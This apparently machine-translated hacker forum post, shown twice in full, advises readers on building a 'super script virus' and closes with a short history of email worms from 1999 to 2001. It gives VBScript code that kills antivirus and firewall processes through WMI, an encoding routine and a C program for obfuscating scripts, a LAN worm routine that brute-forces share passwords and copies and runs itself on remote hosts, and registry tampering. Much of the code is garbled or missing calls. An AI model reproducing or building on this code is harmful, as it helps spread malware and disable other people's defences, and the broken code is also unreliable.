Ideas for super script viruses
Farewell to the past era when I like to show off and brag, learning some real skills is the bottom line. Study hard and improve every day. Here is the idea of a super script virus.
The creation of script viruses is very easy. For a person who knows nothing about programming, as long as he has enough knowledge of the Windows system and the registry, downloads a few virus codes on the Internet and takes a closer look, he can write a virus variant in a short time. The characteristics of script viruses are just a few, and there are not many programming skills. Therefore, real virus makers do not use vbscript to write viruses. Now, due to the popularity of script languages and the WSH (Windows Script Hosting) launched by Microsoft, these script languages can make trouble on a computer. WSH is a service that allows Visual Basic Script and JScript scripts to run in the Windows environment like batch files on the command line.
It allows Script to create a COM/OLE object in Windows and use methods, properties and events in these objects. The creation of script viruses is very easy. For a person who knows nothing about programming, as long as he has enough knowledge of the Windows system and the registry, download a few virus codes on the Internet and read it carefully, he can write a virus variant in a short time. Therefore, script viruses are easy to write, and they are easy to be clear and prevented. There are so many articles on how to prevent it on the Internet. People also develop, and viruses must evolve. Hypothesis: The old cat has started training. If the mouse does not train, it is not asking for death.
1. Many antivirus software nowadays can make judgments on unknown script viruses, so if the virus wants to survive, it must provide better protection:
(1). Viruses need to use a large number of VMIs to kill antivirus software or firewall processes. Here I give a piece of code:
do
strComputer = "."
Set objWMIService = GetObject(""winmgmts:"" & ""{impersonationLevel=impersonate}!\\"" & strComputer & ""\root\cimv2"")
fv = Array("""", """", """","""", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", "" "", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", ""_avpm.exe"", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """","""", """", """", """", """", """", """", """", """", """", ""_avpcc.exe"", """", """", """", """", ""dv95_O.exe"", """", "" "", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """")"
for Each fa in fv
Set colProcessList = (""Select * from Win32_Process Where Name = ""&fa&"""")
For Each objProcess in colProcessList
()
Next
next
loop
The Array() array stores more than 200 main processes of antivirus software and firewalls. Of course, you can define this array from the beginning of the program. In the infection function section below, you can use it to delete the main program body of these software. I don't need to talk about any questions that even pigs can think of. Because my online name is also called "Pig Pig", these must be run before the antivirus software to achieve their goal.
(2). Viruses should use deformation functions as much as possible and use new encryption algorithms. Of course, the encryption algorithm of scripts is very simple, and it is done very well at this point in the new happy hour.
Execute DeCode("kqe`mv fcjjm ")
Function DeCode(Coded)
For i=1 To Len(Coded)
Curchar=Mid(Coded,i,1)
If Asc(Curchar) = 15 then Curchar=chr(10)
Else if Asc(Curchar) = 16 then Curchar=chr(13)
Else if Asc(Curchar) = 17 then Curchar=chr(32)
Else if Asc(Curchar) = 18 then Curchar=chr(9)
Else Curchar=chr(Asc(Curchar)-2)
end if
DeCode=Decode & Curchar
Next
End function
Here is an example of C (the technology is not up to standard, please give me advice Hackercc@)
#include <>
#include <>
main()
{
FILE *in,*out,*read;
char *exc="Execute DeCode(\"";
char *excu="\")\n";
char *func="Function DeCode(Coded)\nFor i=1 To Len(Coded)\nCurchar=Mid(Coded,i,1)\n";
char *funct="If Asc(Curchar) = 15 then Curchar=chr(10)\nElse if Asc(Curchar) = 16 then Curchar=chr(13)\n";
char *functi="Else if Asc(Curchar) = 17 then Curchar=chr(32)\nElse if Asc(Curchar) = 18 then Curchar=chr(9)\nElse Curchar=chr(Asc(Curchar)-2)\nend if\nDeCode=Decode & Curchar\nNext\nEnd function\n";
char buf[100][101];
char name[30];
char ch;
char *p;
int i=0,j=0;
gets(name);
if((in=fopen(name,"r+"))==NULL)
{
printf("Cant open the file %",name);
exit(0);
}
ch=getc(in);
while(!feof(in))
{
if(ch==15) ch=10;
else if(ch==16) ch=13;
else if(ch==17) ch=32;
else if(ch==18) ch=9;
else ch=ch-2;
fseek(in,-1L,1);
fputc(ch,in);
fseek(in,0L,1);
ch=getc(in);
}
fclose(in);
read=fopen(name,"r+");
do
{
if(i>=100)
{
fclose(in);
}
p=fgets(buf[i],80,in);
i++;
}while(p!=NULL);
fclose(read);
out=fopen(name,"w+");
fputs(exc,out);
for(;j<i-1;j++)
{
fputs(buf[j],out);
}
fputs(excu,out);
fputs(func,out);
fputs(funct,out);
fputs(functi,out);
fclose(out);
}
2. The attack of viruses can be extended to hosts with system vulnerabilities. Worms can use some basic DOS commands and third-party hacking tools to conduct vulnerability attacks.
3. Viruses are transmitted through email and LAN:
Attacking LANs can use simplified network code and use vmi to run viruses directly on remote hosts, and can decipher shared passwords (it takes too much time to solve, so there is no need):
Sub netshare()
Dim o1,o2,o3,o4,rand,dot,count,name,driveconnected, pwd,strings ,k
count = "0"
dot = "."
driveconnected="0"
set yu=createobject("scrip"+"ting."+"filesyst"+"emob"+"ject")
set net=createobject("wsc"+""+"etwork")
set qq=createobject("WSc"+""+"hell")
on error resume next
randomize
randaddress()
do
do while driveconnected ="0"
checkadress()
sharename()
pwd = ""
pqd = ""
strings = "0123456789abcdefghijklmnopqrstuvwxyz"
For k = 1 to len(strings) step 1
"I:", "\\" & "name" &"\C" , "& pwd & mid(strings,k,1)" , "& pqd & mid(strings,k,1)"
If instr(, Wrong) <> 0 Then
pwd = pwd & mid(strings,k,1)
End If
Next
'Deciphering the shared password
enumdrives()
loop
copy()
disconnectdrive()
qq "\\name\con\con",0
run ()
loop
end sub
function run()
Dim Controller, RemoteScript
Set Controller = ("WSHC"+"ontroller")
Set RemoteScript = ("", "name")
RemoteScript, "remote_"
Do While <> 2
100
Loop
RemoteScript
remote_Error()
end function
Sub remote_Error
Dim theError
Set theError =
"Error " & & " - Line: " & & ", Char: " & & vbCrLf & "Description: " &
-1
End Sub
Function disconnectdrive()
"I:"
driveconnected = "0"
end function
Function copy()
dir2&"\", "I:\windows\"
dir2&"\", "I:\windows\system32\"
dir2&"\", "I:\winnt\system32\"
dir2&"\", "I:\winnt\system32\"
dir2&"\", "I:\windows\system32\"
'Copy to the other party's machine.
end function
Function checkaddress()
o4 = o4 +1
if o4 = "255" then randaddress()
end function
Function sharename()
name = " octa & dot & octb & dot & octc & dot & octd "
end function
Function enumdrives()
set you=
For p = 0 to -1
if name = (p) then
driveconnected = 1
else
driveconnected = 0
end if
Next
end function
Function randum()
rand = int((254 * rnd) + 1)
end function
Function randaddress()
if count < 50 then
o1=Int((16) * Rnd + 199)
coun=count + 1
else
randum()
o1=rand
end if
randum()
o2=rand
randum()
o3=rand
o4="1"
end function
4. In order to prevent script viruses, some Windows advanced users deleted the filesystemobject entry in the registry, and the new worm will be at the beginning of execution.
Check whether the filesystemobject item of the system exists. If it does not exist, it will be re-written to the filesystemobject item. Of course, you can also change it to a different name, so some
I don't know antivirus software.
On Error Resume Next
Set wa=CreateObject("WSc"+""+"hell")
tt=("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools")
if tt=1 then
"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 00000000, "REG_DWORD"
end if
uu=("HKEY_CLASSES_ROOT\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}")
if uu="" then
"HKEY_CLASSES_ROOT\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}" , "FileSystemObject", "REG_SZ"
end if
or
"HKEY_CLASSES_ROOT\\CLSID\"
"HKEY_CLASSES_ROOT\\"
"HKEY_CLASSES_ROOT\wangzhitong\", "FileSystem Object", "REG_SZ"
"HKEY_CLASSES_ROOT\wangzhitong\CLSID\", "{0D43FE01-F093-11CF-8940-00A0C9054228}", "REG_SZ"
set yu=createobject("wangzhitong")
Later, the filesystemobject item in the system will be replaced with wangzhitong.
6. How can the worms written by yourself allow other worms to exist in the same system? So you must kill other virus programs. Of course, you have to analyze those virus programs first, just remove them.
--------------------------------------------------------------------------------------------
I simply copied some computer virus history records from other places for your reference
On March 1999, a computer virus called "Melissa" swept across computer networks in Europe and the United States. This virus uses the mail system to copy and spread it in large quantities.
Causes network blockage and even paralysis. Moreover, this virus will also cause leakage during its transmission.
2000/5/: The "LoveLetter" virus appears. The "Love Bug" virus is a script virus that is spread through Microsoft's email system. The email subject of this virus is "I Love You" and contains an attachment "". Once the attachment is opened in Microsoft email, the system will automatically copy and send the virus to all email addresses in the user's address book, which spreads several times faster than the "Melissa" virus.
2001/1/21
A deformed "Melissa" virus attacks Macintosh computer. This virus can infect Mac files.
A large number of emails generated by the virus can block the server, modify the settings of Microsoft Word programs, and infect files and templates.
The email attachment carrying this "Melissa" virus is called "Anniv.DOC". This is the first time this type of virus has pointed its finger at the Macintosh computer.
2001/2/15
On the 13th, Dutch police arrested a 20-year-old man who claimed to have invented the "Kurnikova" computer virus. This person will face a 4-year jail sentence.
The "Kurnikova" virus spread through email occurred in Europe, the Americas and Asia on the 12th, with a large amount of spam accumulated in the email system.
The system speed has slowed down significantly, and some companies simply shut down the email system. The Dutch man claims to be a fan of 19-year-old Russian tennis actress Anna Kurnikova
The author of the virus said that he is not a programming expert, but downloaded the virus from the Internet and wrote the program to complete it.
2001/5/6
A new vicious computer virus, "Happy Time" (Happy Time/VBSSAPPytime.A.Worm), has begun to spread in China.
The "Happy Hour" virus is likely to be a domestic virus, which is a worm-like virus similar to "Love Worm". Users pass the Microsoft Office Suite (Outlook)
When collecting emails with "Happy Hour" virus, regardless of whether the user opens the email, as long as the mouse points to the poisoned email, the "Happy Hour" virus will be activated.
The files in the hard disk are then immediately infected. After infection with the "Happy Hour" virus, if the sum of the date and month of the computer clock is 13,
Then the virus will gradually delete the EXE and Dll files in the hard disk, which will eventually cause the system to be paralyzed.
2001/5/11
The new virus "home page" is spreading around the world, and this virus called "OmePage" is regarded as a "distant relative" of the "Kurnikova" virus. The email carrying this computer virus is titled "Homepage", and the main text of the email reads: "Hi, you should check out this webpage, it is really cool." The email contains an attachment called "HOMEPAGE. SETML. VBS". Once the user opens the attachment, the virus first first copy itself and sends a poison-carrying email to each address in the Microsoft Outlook address book. Then search for the Outlook inbox, delete all the letters named "Homepage" and open several pornographic web pages at the same time. Fortunately, the above virus did not cause much damage, and less than 10,000 computers were paralyzed due to this. Due to the time difference, antivirus companies in the United States prevented the virus after receiving news from the Eastern Hemisphere and successfully resisted the further spread of the virus. (Source: Year Alliance Author: Pig)
Farewell to the past era when I like to show off and brag, learning some real skills is the bottom line. Study hard and improve every day. Here is the idea of a super script virus.
The creation of script viruses is very easy. For a person who knows nothing about programming, as long as he has enough knowledge of the Windows system and the registry, downloads a few virus codes on the Internet and takes a closer look, he can write a virus variant in a short time. The characteristics of script viruses are just a few, and there are not many programming skills. Therefore, real virus makers do not use vbscript to write viruses. Now, due to the popularity of script languages and the WSH (Windows Script Hosting) launched by Microsoft, these script languages can make trouble on a computer. WSH is a service that allows Visual Basic Script and JScript scripts to run in the Windows environment like batch files on the command line.
It allows Script to create a COM/OLE object in Windows and use methods, properties and events in these objects. The creation of script viruses is very easy. For a person who knows nothing about programming, as long as he has enough knowledge of the Windows system and the registry, download a few virus codes on the Internet and read it carefully, he can write a virus variant in a short time. Therefore, script viruses are easy to write, and they are easy to be clear and prevented. There are so many articles on how to prevent it on the Internet. People also develop, and viruses must evolve. Hypothesis: The old cat has started training. If the mouse does not train, it is not asking for death.
1. Many antivirus software nowadays can make judgments on unknown script viruses, so if the virus wants to survive, it must provide better protection:
(1). Viruses need to use a large number of VMIs to kill antivirus software or firewall processes. Here I give a piece of code:
do
strComputer = "."
Set objWMIService = GetObject(""winmgmts:"" & ""{impersonationLevel=impersonate}!\\"" & strComputer & ""\root\cimv2"")
fv = Array("""", """", """","""", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", "" "", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", ""_avpm.exe"", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """","""", """", """", """", """", """", """", """", """", """", ""_avpcc.exe"", """", """", """", """", ""dv95_O.exe"", """", "" "", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """", """")"
for Each fa in fv
Set colProcessList = (""Select * from Win32_Process Where Name = ""&fa&"""")
For Each objProcess in colProcessList
()
Next
next
loop
The Array() array stores more than 200 main processes of antivirus software and firewalls. Of course, you can define this array from the beginning of the program. In the infection function section below, you can use it to delete the main program body of these software. I don't need to talk about any questions that even pigs can think of. Because my online name is also called "Pig Pig", these must be run before the antivirus software to achieve their goal.
(2). Viruses should use deformation functions as much as possible and use new encryption algorithms. Of course, the encryption algorithm of scripts is very simple, and it is done very well at this point in the new happy hour.
Execute DeCode("kqe`mv fcjjm ")
Function DeCode(Coded)
For i=1 To Len(Coded)
Curchar=Mid(Coded,i,1)
If Asc(Curchar) = 15 then Curchar=chr(10)
Else if Asc(Curchar) = 16 then Curchar=chr(13)
Else if Asc(Curchar) = 17 then Curchar=chr(32)
Else if Asc(Curchar) = 18 then Curchar=chr(9)
Else Curchar=chr(Asc(Curchar)-2)
end if
DeCode=Decode & Curchar
Next
End function
Here is an example of C (the technology is not up to standard, please give me advice Hackercc@)
#include <>
#include <>
main()
{
FILE *in,*out,*read;
char *exc="Execute DeCode(\"";
char *excu="\")\n";
char *func="Function DeCode(Coded)\nFor i=1 To Len(Coded)\nCurchar=Mid(Coded,i,1)\n";
char *funct="If Asc(Curchar) = 15 then Curchar=chr(10)\nElse if Asc(Curchar) = 16 then Curchar=chr(13)\n";
char *functi="Else if Asc(Curchar) = 17 then Curchar=chr(32)\nElse if Asc(Curchar) = 18 then Curchar=chr(9)\nElse Curchar=chr(Asc(Curchar)-2)\nend if\nDeCode=Decode & Curchar\nNext\nEnd function\n";
char buf[100][101];
char name[30];
char ch;
char *p;
int i=0,j=0;
gets(name);
if((in=fopen(name,"r+"))==NULL)
{
printf("Cant open the file %",name);
exit(0);
}
ch=getc(in);
while(!feof(in))
{
if(ch==15) ch=10;
else if(ch==16) ch=13;
else if(ch==17) ch=32;
else if(ch==18) ch=9;
else ch=ch-2;
fseek(in,-1L,1);
fputc(ch,in);
fseek(in,0L,1);
ch=getc(in);
}
fclose(in);
read=fopen(name,"r+");
do
{
if(i>=100)
{
fclose(in);
}
p=fgets(buf[i],80,in);
i++;
}while(p!=NULL);
fclose(read);
out=fopen(name,"w+");
fputs(exc,out);
for(;j<i-1;j++)
{
fputs(buf[j],out);
}
fputs(excu,out);
fputs(func,out);
fputs(funct,out);
fputs(functi,out);
fclose(out);
}
2. The attack of viruses can be extended to hosts with system vulnerabilities. Worms can use some basic DOS commands and third-party hacking tools to conduct vulnerability attacks.
3. Viruses are transmitted through email and LAN:
Attacking LANs can use simplified network code and use vmi to run viruses directly on remote hosts, and can decipher shared passwords (it takes too much time to solve, so there is no need):
Sub netshare()
Dim o1,o2,o3,o4,rand,dot,count,name,driveconnected, pwd,strings ,k
count = "0"
dot = "."
driveconnected="0"
set yu=createobject("scrip"+"ting."+"filesyst"+"emob"+"ject")
set net=createobject("wsc"+""+"etwork")
set qq=createobject("WSc"+""+"hell")
on error resume next
randomize
randaddress()
do
do while driveconnected ="0"
checkadress()
sharename()
pwd = ""
pqd = ""
strings = "0123456789abcdefghijklmnopqrstuvwxyz"
For k = 1 to len(strings) step 1
"I:", "\\" & "name" &"\C" , "& pwd & mid(strings,k,1)" , "& pqd & mid(strings,k,1)"
If instr(, Wrong) <> 0 Then
pwd = pwd & mid(strings,k,1)
End If
Next
'Deciphering the shared password
enumdrives()
loop
copy()
disconnectdrive()
qq "\\name\con\con",0
run ()
loop
end sub
function run()
Dim Controller, RemoteScript
Set Controller = ("WSHC"+"ontroller")
Set RemoteScript = ("", "name")
RemoteScript, "remote_"
Do While <> 2
100
Loop
RemoteScript
remote_Error()
end function
Sub remote_Error
Dim theError
Set theError =
"Error " & & " - Line: " & & ", Char: " & & vbCrLf & "Description: " &
-1
End Sub
Function disconnectdrive()
"I:"
driveconnected = "0"
end function
Function copy()
dir2&"\", "I:\windows\"
dir2&"\", "I:\windows\system32\"
dir2&"\", "I:\winnt\system32\"
dir2&"\", "I:\winnt\system32\"
dir2&"\", "I:\windows\system32\"
'Copy to the other party's machine.
end function
Function checkaddress()
o4 = o4 +1
if o4 = "255" then randaddress()
end function
Function sharename()
name = " octa & dot & octb & dot & octc & dot & octd "
end function
Function enumdrives()
set you=
For p = 0 to -1
if name = (p) then
driveconnected = 1
else
driveconnected = 0
end if
Next
end function
Function randum()
rand = int((254 * rnd) + 1)
end function
Function randaddress()
if count < 50 then
o1=Int((16) * Rnd + 199)
coun=count + 1
else
randum()
o1=rand
end if
randum()
o2=rand
randum()
o3=rand
o4="1"
end function
4. In order to prevent script viruses, some Windows advanced users deleted the filesystemobject entry in the registry, and the new worm will be at the beginning of execution.
Check whether the filesystemobject item of the system exists. If it does not exist, it will be re-written to the filesystemobject item. Of course, you can also change it to a different name, so some
I don't know antivirus software.
On Error Resume Next
Set wa=CreateObject("WSc"+""+"hell")
tt=("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools")
if tt=1 then
"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 00000000, "REG_DWORD"
end if
uu=("HKEY_CLASSES_ROOT\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}")
if uu="" then
"HKEY_CLASSES_ROOT\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}" , "FileSystemObject", "REG_SZ"
end if
or
"HKEY_CLASSES_ROOT\\CLSID\"
"HKEY_CLASSES_ROOT\\"
"HKEY_CLASSES_ROOT\wangzhitong\", "FileSystem Object", "REG_SZ"
"HKEY_CLASSES_ROOT\wangzhitong\CLSID\", "{0D43FE01-F093-11CF-8940-00A0C9054228}", "REG_SZ"
set yu=createobject("wangzhitong")
Later, the filesystemobject item in the system will be replaced with wangzhitong.
6. How can the worms written by yourself allow other worms to exist in the same system? So you must kill other virus programs. Of course, you have to analyze those virus programs first, just remove them.
--------------------------------------------------------------------------------------------
I simply copied some computer virus history records from other places for your reference
On March 1999, a computer virus called "Melissa" swept across computer networks in Europe and the United States. This virus uses the mail system to copy and spread it in large quantities.
Causes network blockage and even paralysis. Moreover, this virus will also cause leakage during its transmission.
2000/5/: The "LoveLetter" virus appears. The "Love Bug" virus is a script virus that is spread through Microsoft's email system. The email subject of this virus is "I Love You" and contains an attachment "". Once the attachment is opened in Microsoft email, the system will automatically copy and send the virus to all email addresses in the user's address book, which spreads several times faster than the "Melissa" virus.
2001/1/21
A deformed "Melissa" virus attacks Macintosh computer. This virus can infect Mac files.
A large number of emails generated by the virus can block the server, modify the settings of Microsoft Word programs, and infect files and templates.
The email attachment carrying this "Melissa" virus is called "Anniv.DOC". This is the first time this type of virus has pointed its finger at the Macintosh computer.
2001/2/15
On the 13th, Dutch police arrested a 20-year-old man who claimed to have invented the "Kurnikova" computer virus. This person will face a 4-year jail sentence.
The "Kurnikova" virus spread through email occurred in Europe, the Americas and Asia on the 12th, with a large amount of spam accumulated in the email system.
The system speed has slowed down significantly, and some companies simply shut down the email system. The Dutch man claims to be a fan of 19-year-old Russian tennis actress Anna Kurnikova
The author of the virus said that he is not a programming expert, but downloaded the virus from the Internet and wrote the program to complete it.
2001/5/6
A new vicious computer virus, "Happy Time" (Happy Time/VBSSAPPytime.A.Worm), has begun to spread in China.
The "Happy Hour" virus is likely to be a domestic virus, which is a worm-like virus similar to "Love Worm". Users pass the Microsoft Office Suite (Outlook)
When collecting emails with "Happy Hour" virus, regardless of whether the user opens the email, as long as the mouse points to the poisoned email, the "Happy Hour" virus will be activated.
The files in the hard disk are then immediately infected. After infection with the "Happy Hour" virus, if the sum of the date and month of the computer clock is 13,
Then the virus will gradually delete the EXE and Dll files in the hard disk, which will eventually cause the system to be paralyzed.
2001/5/11
The new virus "home page" is spreading around the world, and this virus called "OmePage" is regarded as a "distant relative" of the "Kurnikova" virus. The email carrying this computer virus is titled "Homepage", and the main text of the email reads: "Hi, you should check out this webpage, it is really cool." The email contains an attachment called "HOMEPAGE. SETML. VBS". Once the user opens the attachment, the virus first first copy itself and sends a poison-carrying email to each address in the Microsoft Outlook address book. Then search for the Outlook inbox, delete all the letters named "Homepage" and open several pornographic web pages at the same time. Fortunately, the above virus did not cause much damage, and less than 10,000 computers were paralyzed due to this. Due to the time difference, antivirus companies in the United States prevented the virus after receiving news from the Eastern Hemisphere and successfully resisted the further spread of the virus. (Source: Year Alliance Author: Pig)